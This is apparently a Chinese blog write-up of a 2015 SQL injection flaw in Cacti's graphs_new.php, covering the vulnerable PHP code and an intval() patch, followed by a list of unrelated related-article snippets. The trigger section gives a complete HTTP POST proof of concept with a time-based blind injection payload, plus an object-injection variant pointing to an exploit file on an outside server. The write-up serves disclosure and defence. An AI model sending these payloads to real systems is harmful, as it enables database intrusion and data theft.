catalogue

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

other SQL injection vulnerability via graphs_new.php in cacti was found, reported to the bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. 漏洞触发条件

0x1: POC1: SQL Inject

POST /cacti/graphs_new.php HTTP/1.1

Host: 192.168.217.133

Proxy-Connection: keep-alive

Cache-Control: max-age=

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Origin: http://192.168.217.133 [^]

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36

Content-Type: application/x-www-form-urlencoded

DNT: 1

Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3 [^]

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2

Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Inject

. Login

. POST  http://target/cacti/graphs_new.php

   Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]

    {Injection exp can be found on my server: http://pandas.pw/cacti.exp}

. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--

3. 漏洞影响范围
4. 漏洞代码分析

0x1: Vuls-1: Object Inject To SQL Inject

/graphs_new.php

/* set default action */

if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {

    case 'save':

        //track function form_save

        form_save();

        break;

    case 'query_reload':

        host_reload_query();

        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);

        break;

    default:

        include_once("./include/top_header.php");

        graphs();

        include_once("./include/bottom_footer.php");

        break;

}

form_save();

function form_save()

{

    ..

    if (isset($_POST["save_component_new_graphs"]))

    {

        //Track function host_new_graphs_save()

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs_save();

function host_new_graphs_save()

{

    //variable $selected_graphs_array just unserialized the POST variable which we can control without filter.

    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));

    ..

    //Then the variable goes into a  three-dimensional array , and finally the dirty data we can control enter into the select database query, which caused a SQL injection.

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);

    ..

}

0x2: Vuls-2: SQL Injection

function form_save()

{

    if (isset($_POST["save_component_graph"]))

    {

        /* summarize the 'create graph from host template/snmp index' stuff into an array */

        while (list($var, $val) = each($_POST))

        {

            if (preg_match('/^cg_(\d+)$/', $var, $matches))

            {

                $selected_graphs["cg"]{$matches[]}{$matches[]} = true;

            }

            //cg_g is not filtered

            elseif (preg_match('/^cg_g$/', $var))

            {

                if ($_POST["cg_g"] > )

                {

                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;

                }

            }

            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches))

            {

                $selected_graphs["sg"]{$matches[]}{$_POST{"sgg_" . $matches[]}}{$matches[]} = true;

            }

        }

        if (isset($selected_graphs))

        {

            //外部输入参数带入host_new_graphs中

            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

            exit;

        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

    if (isset($_POST["save_component_new_graphs"])) {

        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);

    }

}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1; 

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt

http://bugs.cacti.net/view.php?id=2652

5. 防御方法

/graphs_new.php

function host_new_graphs_save()

{

    ..

    /*$graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);*/

    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));

    ..

}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {

    /* we use object buffering on this page to allow redirection to another page if no

    fields are actually drawn */

    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = ;

    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {

        while (list($form_id1, $form_array2) = each($form_array)) {

            if ($form_type == "cg") {

                //sql injection in graph_template_id

                $graph_template_id = $form_id1;

                /**/

                $graph_template_id = intval($graph_template_id);

                /**/

                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");

Relevant Link:

http://www.cacti.net/download_cacti.php

6. 攻防思考

Copyright (c) 2016 Little5ann All rights reserved

Cacti /graphs_new.php SQL Injection Vulnerability的更多相关文章

  1. FlarumChina SQL injection Vulnerability

    First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. 通用权限管理系统数据字典 V3.9 版本,欢迎开发个各种业务系统的朋友们,参考表结构

    C#.NET通用权限管理系统组件数据字典 导  航 ◇ (01) BaseItemDetails ◇ (02) BaseItems ◇ (03) BaseLog ◇ (04) BaseMessage ...

  2. ios蓝牙开发(五)BabyBluetooth蓝牙库介绍

    BabyBluetooth 是一个最简单易用的蓝牙库,基于CoreBluetooth的封装,并兼容ios和mac osx. 特色: 基于原生CoreBluetooth框架封装的轻量级的开源库,可以帮你 ...

  3. express-partials与express4.x不兼容问题

    在express中设置view engine为html,express-partials会导致语法不正确,其实只要做一行代码的改动就可以 function renderer(ext){ if(ext[ ...

  4. 移动端前端UI库—Frozen UI、WeUI、SUI Mobile

    [MUI]http://www.dcloud.io/ [Clouda]http://clouda.baidu.com/blend2是百度历时两年共同研发的开源App技术框架,基于Node.js,简单易 ...

  5. 正则表达式语法(msdn)

    “正则表达式”描述在搜索文本正文时要匹配的一个或多个字符串.该表达式可用作一个将字符模式与要搜索的字符串相匹配的模板. 正则表达式包括普通字符(例如,a 到 z 之间的字母)和特殊字符(称为“元字符” ...

  6. Bootstrap中glyphicons-halflings-regular.woff字体报404错notfound

    今天查看网站的源代码,发现有个glyphicons-halflings-regular.woff文件没有找到,因为我的网站使用了bootstrap的Glyphicons 字体图标,因此需要加载Glyp ...

  7. Spring3+Mybatis3+Mysql+ivy+liquibase

    Spring3+Mybatis3+Mysql+ivy+liquibase 集成 近一周时间所学技术:整合Spring+MyBatis+MySql+ivy+liquibase Mybatis:是一个基于 ...

  8. python 之禅

    想要真正深入了解一门语言,需要用心去感受.下面是python之禅,python的设计哲学,对于编程很有指导意义.(翻译部分摘自网络,同时自己有一些更改) >>> import thi ...

  9. [AJAX系列]$.get(url,[data],[fn],[type])

    $.get(url,[data],[fn],[type]) 概述 通过远程HTTP GET请求载入信息 参数 url:待载入页眉的URL地址 data:待发送key/value参数 callback: ...

  10. Failed to execute goal org.codehaus.cargo:cargo-maven2-plugin:1.2.3:run (default-cli) on project Maven_WebTest: Execution default-cli of goal org.codehaus.cargo:cargo-maven2-plugin:1.2.3:run failed: C

    <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/20 ...